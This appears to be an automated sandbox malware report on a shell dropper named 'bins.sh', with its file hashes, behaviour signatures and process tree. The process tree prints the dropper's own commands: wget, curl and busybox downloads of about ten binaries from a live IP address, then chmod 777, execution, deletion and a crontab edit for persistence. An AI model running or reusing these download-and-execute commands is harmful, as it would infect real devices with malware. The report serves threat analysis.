Analysis
-
max time kernel
14s -
max time network
66s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-10-2024 10:12
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
019b932cccb51c260ae4464eb3fd0092
-
SHA1
c279f35f12944e0c4277449bb08dcbd8738f4ffb
-
SHA256
d2f402d2f4147e1cb42252757661db0b29a8ba02bc3dc2cb8ecc85bd552d6e13
-
SHA512
24c2904d745466745babb3702d7f821bfff0b46bcc0bd80ed128772d5b747859deed32ffa836e2316d6673def113ac732ea81641fc68a12aceeb3884bb80dcb6
-
SSDEEP
96:jz5y3yWV+e0QRfltDeRN0mW9OC9Ytzs5j/uBfltDeRN2dmW9OCfJu0wGvqwP/Kze:AyQvbmW9OC9Yds5jILmW9OC9HC+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 686 chmod 767 chmod 781 chmod 795 chmod 787 chmod 673 chmod 711 chmod 725 chmod 737 chmod 750 chmod -
Executes dropped EXE 10 IoCs
Processes:
OqSWqylJMCARVvaF764gZpd3XOfoDbEDCXlPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0VfS60jsRakvO04CfZ7dnLiFCOFojCSbpdDSZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLNNf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQpG89uXFKeEfSIDsxpG6G6rWaYltg39wlNhsHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDGMGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJioc pid process /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX 675 OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC 687 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC /tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V 713 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V /tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS 727 fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS /tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN 738 ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN /tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 752 Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 /tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ 768 kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ /tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh 782 pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh /tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG 788 sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG /tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ 796 MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ -
Renames itself 1 IoCs
Processes:
lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFCpid process 688 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.BvkgLH crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFCcurlcurlcurlcrontabcrontabdescription ioc process File opened for reading /proc/109/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/263/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/734/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/742/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/3/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/4/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/137/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/700/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/789/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/self/auxv curl File opened for reading /proc/17/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/643/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/651/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/20/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/140/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/710/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/761/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/773/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/746/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/760/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/42/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/76/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/701/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/715/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/719/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/731/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/self/auxv curl File opened for reading /proc/5/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/645/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/763/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/799/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/284/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/790/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/735/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/9/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/12/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/13/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/16/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/43/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/166/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/11/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/97/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/138/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/765/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/699/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/718/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/757/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/self/auxv curl File opened for reading /proc/748/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/1/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/6/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/15/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/26/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/683/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/732/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/783/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/650/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/698/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/749/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/755/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC File opened for reading /proc/794/cmdline lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetwgetbusyboxbusyboxbusyboxcurlbusyboxbusyboxbusyboxbusyboxbusyboxcurlbusyboxdescription ioc process File opened for modification /tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ busybox File opened for modification /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX wget File opened for modification /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC wget File opened for modification /tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V busybox File opened for modification /tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ busybox File opened for modification /tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG busybox File opened for modification /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX curl File opened for modification /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC busybox File opened for modification /tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS busybox File opened for modification /tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6 busybox File opened for modification /tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh busybox File opened for modification /tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX busybox File opened for modification /tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC curl File opened for modification /tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX2⤵
- Writes file to tmp directory
PID:648
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:664
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX2⤵
- Writes file to tmp directory
PID:670
-
-
/bin/chmodchmod 777 OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX2⤵
- File and Directory Permissions Modification
PID:673
-
-
/tmp/OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX./OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX2⤵
- Executes dropped EXE
PID:675
-
-
/bin/rmrm OqSWqylJMCARVvaF764gZpd3XOfoDbEDCX2⤵PID:678
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC2⤵
- Writes file to tmp directory
PID:680
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC2⤵
- Writes file to tmp directory
PID:685
-
-
/bin/chmodchmod 777 lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC2⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC./lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:687 -
/bin/shsh -c "crontab -l"3⤵PID:689
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:690
-
-
-
/bin/shsh -c "crontab -"3⤵PID:691
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:692
-
-
-
-
/bin/rmrm lPyID0N6HRStgnQyHNuSMHJglK3T0s5VFC2⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V2⤵PID:705
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V2⤵
- Writes file to tmp directory
PID:708
-
-
/bin/chmodchmod 777 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V./9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm 9WsgKfLmKQ2xTQOJ91sCEI3AnbN1Ltiq0V2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS2⤵PID:717
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS2⤵PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS2⤵
- Writes file to tmp directory
PID:721
-
-
/bin/chmodchmod 777 fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS./fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm fS60jsRakvO04CfZ7dnLiFCOFojCSbpdDS2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN2⤵PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN2⤵
- Writes file to tmp directory
PID:735
-
-
/bin/chmodchmod 777 ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN./ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm ZW5Bf3mMGsjd0m3m5obrJPynf5k9gcVkLN2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG62⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG62⤵PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG62⤵
- Writes file to tmp directory
PID:747
-
-
/bin/chmodchmod 777 Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG62⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG6./Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG62⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm Nf3roFKYEiWNyMVNGdzt1mtUs5p6CSiuG62⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ2⤵
- Checks CPU configuration
- Reads runtime system information
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ2⤵
- Writes file to tmp directory
PID:761
-
-
/bin/chmodchmod 777 kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ./kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm kGbi7DWyznWPAd3YvAeT3vsUldBDSqQpXQ2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh2⤵PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh2⤵
- Writes file to tmp directory
PID:779
-
-
/bin/chmodchmod 777 pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh./pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm pG89uXFKeEfSIDsxpG6G6rWaYltg39wlNh2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG2⤵
- Checks CPU configuration
- Reads runtime system information
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG2⤵
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod 777 sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG./sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm sHNr1LByAHmItzlh7ZGunNpmYjIDO2ACDG2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ2⤵
- Checks CPU configuration
- Reads runtime system information
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ2⤵
- Writes file to tmp directory
PID:792
-
-
/bin/chmodchmod 777 MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ./MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm MGkiX6LPpFExMsSCgacJIe0AuVKrPyeaDJ2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZUwwzf5RQTGsR9rxK4js3vcYM4ereP90ae2⤵PID:800
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
-
Filesize
129KB
MD552f72bcf31899453b40d37a7cbf55f35
SHA16dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
210B
MD55dfe34fa8fe6a9fe09cc3f97b821e146
SHA1431ff89a7f23e03f3717e841432aab0a40c831c6
SHA256e4c01747eafc1e79850fcf9ba9d5294253e29fd469ad7cfef6ddee2ab7af7aba
SHA5122e18701cde70a61329fce5c339e792ad80acfe88be2b6560e4f91e6bb6cd044992f5e2f900b98d6fa9a8adfc5785defb8ff3637728d1d7e402193f226c0dbe8c